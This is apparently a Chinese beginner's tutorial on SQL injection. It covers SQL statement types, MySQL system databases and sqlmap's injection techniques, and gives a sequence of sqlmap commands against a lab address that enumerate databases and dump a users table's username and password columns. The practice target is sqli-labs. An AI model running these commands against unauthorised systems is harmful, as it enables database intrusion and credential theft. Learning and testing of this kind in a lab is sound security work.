学习SQL注入系列篇(1)
文章目录
- SQL注入原理和流程
- SQL类型
- 获取数据库信息
- SQL注入工具
- 1. SQLmap常用命令使用
SQL注入原理和流程
SQL类型
- DQL:数据查询语言(select)
- DML:数据操作语言(insert, update, delete)
- DDL:数据定义语言(create, drop, alter)
- DCL:数据控制语言(grant, revoke, commit, rollback)
- 函数:字符串函数、数字函数、日期函数
- 运算符:算术运算符、比较运算符、逻辑运算符、位运算符
获取数据库信息
- show命令
- select + 函数
- 系统库
系统库
系统库 | 描述 |
---|---|
information_schema
|
MySQL服务器所有数据库的信息 |
mysql
|
基存储数据库的用户、权限设置、关键字等 |
performance_schema
|
主要用于收集数据库服务器性能参数 |
sys
|
数据来自performance_schema
|
SQL注入工具
sqlmap
类型 | 描述 |
---|---|
boolean-based blind
|
基于Boolean的盲注 |
time-based blind
|
基于时间的盲注 |
error-based
|
基于报错 |
UNION query-based
|
基于联合查询 |
stacked queries
|
基于多条SQL语句(堆叠注入) |
out-of-band(OOB)
|
非应用内通信注入,比如DNSLog |
1. SQLmap常用命令使用
sqlmap -u http://192.168.2.200/url.php?id=1
sqlmap -u "http://192.168.2.200/url.php?id=1" --current-db
sqlmap -u "http://192.168.2.200/url.php?id=1" --level=5 --risk=3 --dbs
sqlmap -u "http://192.168.2.200/url.php?id=1" --level=5 --risk=3 --dbms=mysql -D "security" --tables
sqlmap -u "http://192.168.2.200/url.php?id=1" --level=5 --risk=3 --dbms=mysql -D "security" -T "users" --col
sqlmap -u "http://192.168.2.200/url.php?id=1" --level=5 --risk=3 --dbms=mysql -D "security" -T "users" -C "password,username" --dump
靶场: sqli-labs
支持php7的代码链接地址: sqli_labs_sqli-version
学习SQL注入系列篇(1)相关推荐
- 渗透学习-SQL注入篇-基础知识的学习(持续更新中)
提示:仅供进行学习使用,请勿做出非法的行为.如若由任何违法行为,将依据法律法规进行严惩!!! 文章目录 前言 一.SQL注入产生的原因 二.手工注入大致过程 1.判断注入点: 2.猜解列名 3.猜解能 ...
- 学习sql注入:猜测数据库_对于SQL的热爱:为什么要学习它以及它将如何帮助您...
学习sql注入:猜测数据库 I recently read a great article by the esteemed @craigkerstiens describing why he feel ...
- 学习sql注入:猜测数据库_学习SQL:删除和更新数据SQL最佳实践
学习sql注入:猜测数据库 Deleting and updating data is very common, but if performed without taking care, which ...
- 学习sql注入:猜测数据库_学习SQL:SQL数据类型
学习sql注入:猜测数据库 What are SQL data types, why do we need them, and how to use them? Today, we'll try to ...
- SQL注入回顾篇(四)
前言 忆往昔,峥嵘岁月稠!大学已经到了大三了,打了很多比赛,回顾还是挺欣慰!此系列来由是想留一点东西,把所学知识整理一下,同时也是受github上Micro8分享的启发,故想做一些工作,以留后人参考, ...
- web安全学习-sql注入-针对mysql的攻击
文章目录 1. 前言 补充:读取客户端本地文件到服务端mysql数据库 补充:利用全局日志写shell 补充:修改mysql的root密码 补充:配置远程登录 补充:低权限下读文件 补充:高版本mys ...
- SQL注入回顾篇(一)
前言 忆往昔,峥嵘岁月稠!大学已经到了大三了,打了很多比赛,回顾还是挺欣慰!此系列来由是想留一点东西,把所学知识整理一下,同时也是受github上Micro8分享的启发,故想做一些工作,以留后人参考, ...
- 学习sql注入:猜测数据库_面向数据科学家SQL:学习简单方法
学习sql注入:猜测数据库 We don't pick a hammer and look for nails - that would be an unusual way of solving pr ...
- 关于DVWA的学习-SQL注入
关于DVWA的学习-SQL注入 low Background 一般的查询语句的结构如下: SELECT column_name FROM table_name WHERE ID=$id 我们输入的内容 ...
最新文章
- “三巨头”齐获图灵奖!沉浮30载终于开启AI复兴时代
- 反思网络中的观点:太过杂乱 需要很强的甄别能力
- Scala Package Package Objects
- CodeForces - 1612A Distance
- python自动处理多个txt文件_怎么用python去实现几个文件中内容的并行处理
- 胶囊碰撞体(CapsuleCollider)
- 单片机实验板 c语言 打包下载,《AVR单片机开发板 实验板 C语言 视频教程 》
- dx逆向建模步骤_产品温度的逆向建模的系统和方法与流程
- 一步一步教你 https 抓包
- 【渝粤题库】陕西师范大学201041德育论 作业(专升本)
- Cadence学习之路:什么是PCB工艺的正片与负片
- 【Django】基于PythonWeb的Django框架设计实现天天生鲜系统-7首页界面
- 计算机设置ip后提示未识别网络连接,Win7出现提示“未识别的网络无Internet访问”怎么解决?...
- 《程序员》8月:移动开发新技术探索
- gcc -O0 -g 和gcc -O3 -g
- html页面通过flv.js实现视频监控直播和点播功能。
- stm32--工程结构的简单理解
- linux wifi设置端口号,Linux 下wifi 驱动开发(四)—— USB接口WiFi驱动浅析
- Mac 如何升级 Ruby 版本
- 异地恋的自愈系小故事:企鹅先生和北极熊小姐
热门文章
- 内存检测工具 MemTest 4.0
- Linux之文件上传和下载(两种方式)
- 如何应用知识管理,成就高绩效项目?
- 华为手机内置存储android可以删除吗,手机内置储存怎么清理 手机缓存清理教程...
- 中学生应该学会使用计算机作文,初中生学会选择的作文三篇
- 查伪输入imel1还是imel2_重新开一贴,科普下电脑知识,电脑小白们,可以来这里学习~~...
- qpython3.7.4版本下载_QPython OH最新版本下载-QPython OH appv3.1.0 最新版-腾牛安卓网
- 方舟手游怎么看最新服务器机柜销售,方舟生存进化PVX服务器怎么玩 PVX服务器规则一览...
- nodejs在windows下安装后npm命令无法使用的解决方法
- 你了解Yaf 是什么嘛?